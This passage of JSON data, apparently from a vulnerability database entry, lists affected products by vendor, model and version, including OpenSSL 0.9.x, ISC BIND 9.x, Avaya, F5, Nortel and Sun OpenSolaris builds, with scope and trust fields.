            "vendor": "avaya",
            "version": "4.2.1"
          },
          {
            "_id": null,
            "model": "project openssl i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 01",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "bind rc2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 92",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.7"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "rpath",
            "version": "2"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1.5"
          },
          {
            "_id": null,
            "model": "project openssl d",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "big-ip psm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4.8"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 83",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.2"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 106",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "meeting exchange",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "networks vpn router contivity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-45000"
          },
          {
            "_id": null,
            "model": "networks switched firewall series",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5300"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.2"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.1"
          },
          {
            "_id": null,
            "model": "hp-ux b.11.23",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "project openssl beta2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "6.4-release-p2",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "11x64"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.0.2"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.10"
          },
          {
            "_id": null,
            "model": "networks vpn router contivity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-46000"
          },
          {
            "_id": null,
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.4"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "bind 9.5.0-p2",
            "scope": null,
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "bind 9.6.0-p1",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "proactive contact",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.0.2"
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "17500"
          },
          {
            "_id": null,
            "model": "firepass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "6.0.2"
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "pardus",
            "version": "20080"
          },
          {
            "_id": null,
            "model": "personal",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "_id": null,
            "model": "networks self-service peri application",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "_id": null,
            "model": "cwrsync",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cwrsync",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.3"
          },
          {
            "_id": null,
            "model": "communication manager sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "11.1"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 76",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "project openssl e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "proactive contact",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "7.0-release",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 101a",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "communication manager sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.10"
          },
          {
            "_id": null,
            "model": "project openssl f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 87",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.8"
          },
          {
            "_id": null,
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.6.1"
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5000"
          },
          {
            "_id": null,
            "model": "wanjet",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.2.8"
          },
          {
            "_id": null,
            "model": "appliance server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "firepass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "5.5.2"
          },
          {
            "_id": null,
            "model": "bind 9.5.0b1",
            "scope": null,
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "linux lpia",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.10"
          },
          {
            "_id": null,
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2009.0"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.2"
          },
          {
            "_id": null,
            "model": "bind p1",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.3.6"
          },
          {
            "_id": null,
            "model": "big-ip psm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4.5"
          },
          {
            "_id": null,
            "model": "bind 9.5.0a5",
            "scope": null,
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 57",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.4"
          },
          {
            "_id": null,
            "model": "project openssl l",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "firepass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.5"
          },
          {
            "_id": null,
            "model": "linux enterprise desktop sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "appliance platform linux service",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "rpath",
            "version": "2"
          },
          {
            "_id": null,
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "meeting exchange enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "linux lts sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "linux s/390",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.1"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.2"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.10"
          },
          {
            "_id": null,
            "model": "eid middleware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "belgium",
            "version": "2.6"
          },
          {
            "_id": null,
            "model": "aura sip enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1.1"
          },
          {
            "_id": null,
            "model": "sparc enterprise m8000",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "project openssl d",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4.1"
          },
          {
            "_id": null,
            "model": "aura sip enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "bind rc3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.7"
          },
          {
            "_id": null,
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.5"
          },
          {
            "_id": null,
            "model": "linux lts lpia",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "_id": null,
            "model": "enterprise linux as ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "networks vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "30500"
          },
          {
            "_id": null,
            "model": "bigip application security manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.3"
          },
          {
            "_id": null,
            "model": "sparc t3-4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "0"
          },
          {
            "_id": null,
            "model": "wanjet",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "grid engine 32-bit sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.6"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.3.1"
          },
          {
            "_id": null,
            "model": "linux m68k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux arm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "cwrsync",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cwrsync",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "2510"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.2.3"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.2"
          },
          {
            "_id": null,
            "model": "bind 9.4.2-p2-w1",
            "scope": null,
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "hp-ux b.11.31",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.9"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "big-ip local traffic manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.3"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openbsd",
            "version": "4.4"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.5"
          },
          {
            "_id": null,
            "model": "bind -p1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4.1"
          },
          {
            "_id": null,
            "model": "linux hppa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "project openssl e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "networks self-service mps",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "10000"
          },
          {
            "_id": null,
            "model": "project openssl f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "1.8"
          },
          {
            "_id": null,
            "model": "bigip global traffic manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "networks vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "30700"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.4"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 102",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 02",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.2"
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "1.4.1"
          },
          {
            "_id": null,
            "model": "linux enterprise teradata sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "pfsense 1.2-rc3",
            "scope": null,
            "trust": 0.3,
            "vendor": "bsdperimeter",
            "version": null
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.1"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.7"
          },
          {
            "_id": null,
            "model": "bind b1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.10"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2"
          },
          {
            "_id": null,
            "model": "enterprise linux es ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 80",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.11"
          },
          {
            "_id": null,
            "model": "firepass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "6.0.1"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "communication manager sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1.4"
          },
          {
            "_id": null,
            "model": "p5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ntp",
            "version": "4.2.4"
          },
          {
            "_id": null,
            "model": "big-ip local traffic manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.6.1"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 104",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "communication manager server s8100",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "big-ip wan optimization module",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0.1"
          },
          {
            "_id": null,
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.10"
          },
          {
            "_id": null,
            "model": "netra sparc t3-1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "0"
          },
          {
            "_id": null,
            "model": "project openssl k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "p153",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ntp",
            "version": "4.2.5"
          },
          {
            "_id": null,
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 107",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "12.0"
          },
          {
            "_id": null,
            "model": "wanjet",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.2.16"
          },
          {
            "_id": null,
            "model": "sparc t3-1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "0"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.3"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "bind b2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "linux lts powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "cwrsync",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cwrsync",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "beta4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "11"
          },
          {
            "_id": null,
            "model": "project openssl beta3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.4"
          },
          {
            "_id": null,
            "model": "bigip global traffic manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.5"
          },
          {
            "_id": null,
            "model": "linux lts amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.1"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.10"
          },
          {
            "_id": null,
            "model": "intuity audix lx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "linux lts powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 84",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "enterprise linux ws ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.9"
          },
          {
            "_id": null,
            "model": "project openssl m",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "linux enterprise server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "messaging storage server mm3.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "grid engine 64-bit sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "p150",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ntp",
            "version": "4.2.5"
          },
          {
            "_id": null,
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "1.3.1"
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1700"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "bind rc1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "project openssl j",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "grid engine",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "voice portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.7"
          },
          {
            "_id": null,
            "model": "project openssl e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "linux enterprise desktop sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "11"
          },
          {
            "_id": null,
            "model": "pfsense 1.2-rc1",
            "scope": null,
            "trust": 0.3,
            "vendor": "bsdperimeter",
            "version": null
          },
          {
            "_id": null,
            "model": "linux ia-32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "big-ip wan optimization module",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "bind p1",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.5.1"
          },
          {
            "_id": null,
            "model": "bind a2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.5"
          },
          {
            "_id": null,
            "model": "bind a6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 22",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "bind 9.5.0a4",
            "scope": null,
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.2"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 81",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4.1"
          },
          {
            "_id": null,
            "model": "message networking",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "bigip application security manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 103",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "big-ip local traffic manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.6"
          },
          {
            "_id": null,
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.2"
          },
          {
